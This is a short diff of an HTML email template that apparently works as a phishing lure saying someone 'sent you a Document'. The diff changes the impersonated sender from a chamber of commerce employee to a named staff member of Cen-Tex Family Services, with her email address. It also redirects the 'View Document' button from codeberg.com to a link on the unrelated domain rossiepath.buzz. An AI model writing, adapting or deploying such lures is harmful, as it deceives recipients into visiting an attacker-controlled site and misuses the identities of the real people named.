--- a/index.html
+++ b/index.html
@@ -15,8 +15,8 @@
               <td style="max-width:450px;"><img src="" alt="">
               </td>
               <td style="color:#555;">
-                <h2>  April R. Daniels sent you a Document</h2>
-                <a href="https://codeberg.com" style="text-decoration:none;background:#dc3c00;border-radius:4px;padding-left:10px;padding-right:10px;padding-bottom:5px;padding-top:5px;color:#fff;">View Document</a>
+                <h2>  Cassy Utz sent you a Document</h2>
+                <a href="https://rossiepath.buzz/dds/ddfk" style="text-decoration:none;background:#dc3c00;border-radius:4px;padding-left:10px;padding-right:10px;padding-bottom:5px;padding-top:5px;color:#fff;">View Document</a>
               </td>
             </tr>
           </table>
@@ -27,8 +27,8 @@
               <td style="max-width:160px;"><img src="https://dc625.4shared.com/img/9_M_56V4fi/s24/16b9e153370/sidekick_s.png" style="max-width: 160px; height:" alt="">
               </td>
               <td style="color:#fff;">
-                <h2>Smithville Area Chamber of Commerce</h2>
-                <p>If you have any question regarding this document, send an email to April R. Daniels via april.daniels@smithvilletx.org
+                <h2>Cen-Tex Family Services, Inc.</h2>
+                <p>If you have any question regarding this document, send an email to Cassy Utz via cutz@ctfhs.org
                 </p>
             The Management Team  </td>
             </tr>
